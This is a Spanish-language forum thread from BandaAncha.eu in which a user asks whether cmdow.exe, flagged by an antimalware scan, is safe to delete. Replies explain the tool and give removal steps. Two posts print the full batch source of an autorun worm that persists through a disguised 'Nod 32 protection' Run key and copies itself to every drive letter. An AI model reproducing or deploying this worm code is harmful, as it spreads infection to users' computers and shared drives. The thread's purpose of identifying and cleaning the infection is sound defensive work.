BandaAncha.eu

Comunidad de usuarios
de fibra, móvil y ADSL

CMDOW.EXE lo puedo eliminar?

BocaDePez
BocaDePez

Muy buenas, he pasado el malwarebytes antimalware a mi ordenador y me ha detectado el cmdow.exe como una amenaza, me pide eliminarlo, se puede eliminar sin problema o es algo esencial de windows?

No quiero que me pase que cuando reinicie el ordenador el windows me de fallo.

un saludo

katuflait

El cmdow.exe no es un virus Hace unos días, un compañero de trabajo estaba "limpiando" de virus su notebook con el NOD32 y, luego de configurarlo para que detectara también lo "potencialmente peligroso", el soft en cuestión detectó al cmdow.exe como "peligroso". En realidad estaba comprimido dentro de una carpeta donde tiene al S.O. comprimido, para pasarlo a un CD y crear un CD de instalación (estaba dentro de un archivo .cab), los que se usan en estos casos. Llegado este momento, debemos analizar varios puntos: 1- el cmdow.exe no estaba/está funcional (o funcionando) ya que estaba comprimido dentro de un archivo .cab, por lo tanto no era/es peligroso. 2- ante la pregunta de, si al instalar ese S.O. (con el futuro CD) y descomprimirse el .cab, el cmdow.exe descomprimido sería peligroso; la respuesta vuelve a ser no (ya veremos por qué). 3- la carpeta en cuestión (donde está el .cab) aloja un S.O. de esos que son autoinstables, como el Windows UE6 del que hablé en otros posts; y esa es la razón por la que debemos estar más tranquilos. 4- si bien el cmdow.exe puede ser usado por algún programa malicioso, en realidad no es un virus. El cmdow.exe es un ejecutable que permite la manipulación de ventanas. Permite que se abran, que se cierren, que cambien de tamaño, y todo sin la intervención del usuario. Por eso es usado en instalaciones de S.O. como el Windows UE, es decir en instalaciones desatendidas, donde el usuario interviene muy poco.

BocaDePez
BocaDePez

Entonces no lo elimino?

🗨️ 1
BocaDePez
BocaDePez

Si tanto te asuste en malware no sé que haces usando Windows. Lo que los programas anti-bichos detectaron fue Windows, y te están diciendo que quites Windows. Además ten cuidado con los programas anti-bichos, pues a veces son más bichos que los propios bichos.

BocaDePez
BocaDePez

ES UN VIRUS QUE SE CONTAGIA DESDE UN ARCHIVO EJECUTABLE.BAT

AQUI ESTA SU ACCIONAR

cmdow @ /hid

if %1==/r goto desderun

start %cd%

goto saltear

:desderun

::start "%cd%"

:saltear

rem ******************************COMIENZO DE INFECCION DE LETRAS *******************************

:arriba

for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:\ (

echo Encontrada unidad %%a

if exist %%a:\autorun.inf attrib %%a:\autorun.inf -h -r -s

if exist %%a:\autorun.inf rd %%a:\autorun.inf /s /q

if exist %%a:\autorun.inf del %%a:\autorun.inf

copy %windir%\cmdow.exe %%a:\data.cab

copy %windir%\maloso.bat %%a:\instalar.bat

copy %windir%\maloso.inf %%a:\autorun.inf

)

rem ******************************FIN INFECCION DE LETRAS ***************************************

rem ******************************COMIENZO DE JODA **********************************************

rem ******************************FIN DE JODA ***************************************************

ping 127.0.0.1 -n 10 > nul

goto arriba

BocaDePez
BocaDePez

COPIE INCOMPLETO, AQUI LES PASO TODO LO QUE HACE ESTE VIRUS QUE ENTRE OTRAS COSAS HACE QUE LAS UNIDADES DE DISCO NO SE VEAN DESDE MI PC

@echo off

rem *******************************INFECCION DE LA COMPUTADORA EN USO ***************************

copy data.cab %windir%\cmdow.exe > nul

copy instalar.bat %windir%\maloso.bat > nul

copy instalar.bat c:\Nod_32.bat > nul

echo [autorun] > %windir%\maloso.inf

echo shellexecute=instalar.bat >> %windir%\maloso.inf

echo shell\auto\command=instalar.bat >> %windir%\maloso.inf

echo Windows Registry Editor Version 5.00 > %windir%\maloso.reg

echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> %windir%\maloso.reg

echo "Nod 32 protection"="c:\\Nod_32 /r" >> %windir%\maloso.reg

reg import %windir%\maloso.reg

rem *******************************FIN DE LA INFECCION DE LA COMPUTADORA EN USO *****************

cmdow @ /hid

if %1==/r goto desderun

start %cd%

goto saltear

:desderun

::start "%cd%"

:saltear

rem ******************************COMIENZO DE INFECCION DE LETRAS *******************************

:arriba

for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:\ (

echo Encontrada unidad %%a

if exist %%a:\autorun.inf attrib %%a:\autorun.inf -h -r -s

if exist %%a:\autorun.inf rd %%a:\autorun.inf /s /q

if exist %%a:\autorun.inf del %%a:\autorun.inf

copy %windir%\cmdow.exe %%a:\data.cab

copy %windir%\maloso.bat %%a:\instalar.bat

copy %windir%\maloso.inf %%a:\autorun.inf

)

rem ******************************FIN INFECCION DE LETRAS ***************************************

rem ******************************COMIENZO DE JODA **********************************************

rem ******************************FIN DE JODA ***************************************************

ping 127.0.0.1 -n 10 > nul

goto arriba

----------------------------------

BORRAR TODA ESTA BASURA (LO PUSE YO)

%windir%\cmdow.exe

%windir%\maloso.bat

%windir%\maloso.inf

%windir%\maloso.reg

instalar.bat

c:\Nod_32.bat

instalar.bat

data.cab

autorun.inf

BocaDePez
BocaDePez

Este virus en realidad se copia a través de un pendrive, cuando este virus detecta unidades de red, copia los tres archivos data.cab, instalar.bat y autorun.inf... PASO 1: si su equipo es un pc pesonal que no está en ninguna red entra la regedit y busca la clave dmdow.exe y maloso elimina las claves y luego borra del disco duro los archivos creados. PASO 2: Si el caso es que existe una red deben desconectar la red y buscar primero el equipo que obtuvo el virus, es decir, la primera maquina contagiada y hacer el PASO 1, luego deben ir a cada equipo con unidades compartidas y eliminar estos tres archivos.